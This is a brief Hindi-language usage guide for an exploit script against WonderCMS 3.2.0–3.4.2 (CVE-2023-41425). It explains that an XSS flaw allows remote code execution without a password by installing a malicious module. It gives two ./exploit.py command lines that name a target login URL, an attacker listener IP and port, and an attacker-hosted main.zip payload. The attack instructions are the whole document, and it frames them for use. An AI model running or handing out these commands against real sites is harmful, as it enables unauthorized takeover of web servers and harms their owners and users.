
WonderCMS RCE CVE-2023-41425
WonderCMS संस्करण v3.2.0 से v3.4.2 XSS भेद्यता के साथ एक दुर्भावनापूर्ण अभिनेता को installModule CVE-2023-41425 पर एक घटक अपलोड करके RCE प्राप्त करने की अनुमति देते हैं (पासवर्ड जानने की आवश्यकता नहीं है)।
उस रिमोट होस्ट को निर्दिष्ट करना जहाँ से main.zip फ़ाइल डाउनलोड की जाती है
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
या main.zip फ़ाइल निर्दिष्ट नहीं करना। डिफ़ॉल्ट रूप से, यह main.zip से डाउनलोड करता है
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
